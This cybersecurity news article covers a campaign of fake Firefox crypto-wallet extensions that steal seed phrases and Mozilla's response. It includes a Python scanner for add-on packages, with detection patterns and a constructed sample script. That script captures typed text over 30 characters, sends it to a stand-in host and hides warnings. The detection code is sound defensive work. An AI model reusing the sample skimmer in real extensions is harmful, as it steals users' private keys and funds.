40+ Malicious Firefox Extensions Target Cryptocurrency Users in Massive Theft Campaign

CyberSecureFox 🦊

Cybersecurity researchers from Koi Security have uncovered a sophisticated cryptocurrency theft operation targeting Firefox users through over 40 malicious browser extensions distributed via Mozilla’s official add-on store. The campaign demonstrates advanced social engineering techniques, with attackers creating convincing replicas of popular cryptocurrency wallet extensions to steal users’ digital assets and private keys.

Sophisticated Impersonation of Leading Crypto Wallets

The threat actors displayed remarkable attention to detail in their deception strategy, creating fraudulent versions of extensions for industry-leading cryptocurrency wallets. The compromised brands include Coinbase, MetaMask, Trust Wallet, Phantom, Exodus, OKX, Keplr, and MyMonero – collectively representing millions of legitimate users worldwide.

What makes this campaign particularly dangerous is the attackers’ use of open-source code from legitimate wallet applications as the foundation for their malicious clones. This technique allowed cybercriminals to create nearly identical replicas of trusted extensions while embedding hidden malicious functionality that operates beneath the surface.

Technical Analysis of the Malware Mechanism

The technical implementation reveals a high level of sophistication in the attack methodology. The malicious extensions deploy specialized input and click event handlers that continuously monitor user interactions with web pages, specifically targeting sensitive cryptocurrency-related data entry.

The malware’s algorithm focuses on analyzing text strings longer than 30 characters, a threshold designed to capture private keys and seed phrases commonly used in cryptocurrency transactions. Once these critical data elements are identified, the malware immediately transmits them to command-and-control servers operated by the threat actors.

To avoid detection, the developers implemented an advanced stealth technique by setting all error dialogs and security warnings to zero opacity (opacity: 0). This rendering technique makes all warning messages completely invisible to users, preventing them from recognizing suspicious activity or potential security breaches.
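The behaviour described in the three paragraphs above (input/click handlers, a length threshold on captured text, transmission to a remote server, and opacity-0 hiding of warnings) can be turned into a static triage check over an add-on package. The following scanner is an added example written for this page, not tooling from Koi Security or Mozilla; the regexes, the scoring rule, the sample manifest and the sample content script are all constructed assumptions, and a hit on any single indicator is common in benign extensions, so only the combination is treated as suspicious.

```python
"""Static triage of Firefox add-on packages (.xpi) for the indicator pattern
described in the article. Added, illustrative code: the indicator regexes,
the verdict rule and the sample extension below are assumptions."""
import io
import json
import re
import zipfile
from pathlib import Path

# Indicators drawn from the write-up. Each alone is ordinary in benign code,
# so the verdict depends on how many co-occur in one package.
INDICATORS = {
    "input_or_click_listener": re.compile(
        r"addEventListener\(\s*['\"](?:input|keyup|keydown|change|paste|click)['\"]"),
    "length_threshold_check": re.compile(r"\.length\s*>=?\s*\d{2,}"),
    "outbound_transmission": re.compile(r"\b(?:fetch|XMLHttpRequest|sendBeacon)\b"),
    "opacity_zero_styling": re.compile(
        r"opacity\s*[:=]\s*['\"]?0(?:\.0+)?['\"]?(?![.\d])"),
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def score_extension(manifest: dict, scripts: dict) -> dict:
    """Return indicator hits per script plus an overall verdict.

    manifest: parsed manifest.json; scripts: {filename: JavaScript source}.
    """
    hits = {}
    for name, src in scripts.items():
        found = sorted(k for k, rx in INDICATORS.items() if rx.search(src))
        if found:
            hits[name] = found
    distinct = set().union(*hits.values()) if hits else set()
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        perms |= set(cs.get("matches", []))
    broad = bool(perms & BROAD_HOSTS)
    # Capturing input on every site and sending it out is the core of the
    # described behaviour; further indicators raise confidence.
    core = {"input_or_click_listener", "outbound_transmission"} <= distinct and broad
    if core and len(distinct) >= 3:
        verdict = "suspicious"
    elif distinct:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hits": hits, "indicators": sorted(distinct),
            "broad_host_access": broad, "verdict": verdict}


def load_xpi(src) -> tuple:
    """Read manifest.json and every .js file from an .xpi (a zip archive).
    src may be a path or a file-like object."""
    with zipfile.ZipFile(src) as z:
        manifest = json.loads(z.read("manifest.json"))
        scripts = {n: z.read(n).decode("utf-8", "replace")
                   for n in z.namelist() if n.endswith(".js")}
    return manifest, scripts


def audit_profile(profile_dir) -> dict:
    """Score every installed add-on under <profile>/extensions/*.xpi."""
    return {p.name: score_extension(*load_xpi(p))
            for p in Path(profile_dir, "extensions").glob("*.xpi")}


# Constructed sample package (not real malware): blanket host access and a
# content script that shows every indicator from the write-up.
SAMPLE_MANIFEST = {
    "manifest_version": 2,
    "name": "Wallet Helper (constructed sample)",
    "permissions": ["<all_urls>", "storage"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"]}],
}
SAMPLE_CONTENT_JS = """
document.addEventListener('input', (e) => {
  const v = e.target.value || '';
  if (v.length > 30) { fetch('https://example.invalid/collect', {method: 'POST', body: v}); }
});
for (const w of document.querySelectorAll('.warning, .error')) { w.style.opacity = '0'; }
"""
# A constructed benign popup script: one indicator, no broad host access.
BENIGN_MANIFEST = {"manifest_version": 2, "name": "Benign popup", "permissions": ["storage"]}
BENIGN_POPUP_JS = ("document.getElementById('go').addEventListener('click', "
                   "() => browser.tabs.create({url: 'https://example.invalid'}));")


def build_sample_xpi() -> bytes:
    """Pack the constructed sample into an in-memory .xpi."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", json.dumps(SAMPLE_MANIFEST))
        z.writestr("content.js", SAMPLE_CONTENT_JS)
    return buf.getvalue()


def analyze_sample() -> dict:
    """Round-trip the constructed package through load_xpi and score it."""
    return score_extension(*load_xpi(io.BytesIO(build_sample_xpi())))


if __name__ == "__main__":
    print(json.dumps(analyze_sample(), indent=2))
```

Running the module scores the constructed package as "suspicious" (all four indicators plus `<all_urls>` access), while the benign popup lands in "review" because a click handler on its own proves nothing. On a real machine, `audit_profile("/path/to/firefox/profile")` walks the installed `.xpi` files; minified or obfuscated code will defeat plain regexes, so treat a "clean" result as absence of obvious indicators, not as a guarantee.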

Campaign Timeline and Scale of Operations

Security analysis indicates this malicious campaign has been active since April 2025, with threat actors continuously uploading new fraudulent extensions to maintain their operation. The most recent malicious samples were discovered just last week, demonstrating the ongoing and persistent nature of this threat.

The attackers employ multiple social engineering tactics to build user trust and encourage installations. Beyond replicating official brand logos and interface designs, many extensions feature hundreds of fabricated positive reviews, often exceeding the actual number of installations – a clear indicator of manipulation.

Mozilla’s Response and Enhanced Security Measures

Following notification from Koi Security researchers, Mozilla has implemented emergency response protocols to address the threat. Company representatives confirmed awareness of the security incident and initiated immediate removal procedures for identified malicious extensions.

Coincidentally, Mozilla recently introduced an enhanced early detection system specifically designed to identify cryptocurrency-related fraudulent add-ons. This new system creates risk profiles for each wallet extension and automatically alerts security moderators when suspicious patterns reach predetermined threat thresholds.

This incident underscores the critical importance of exercising extreme caution when installing browser extensions, particularly those handling cryptocurrency assets. Users should exclusively download extensions from official sources, thoroughly examine user reviews for authenticity, and verify developer credentials before installing any add-ons related to digital asset management. Additionally, implementing multi-factor authentication and regularly auditing installed extensions can significantly reduce exposure to similar threats.
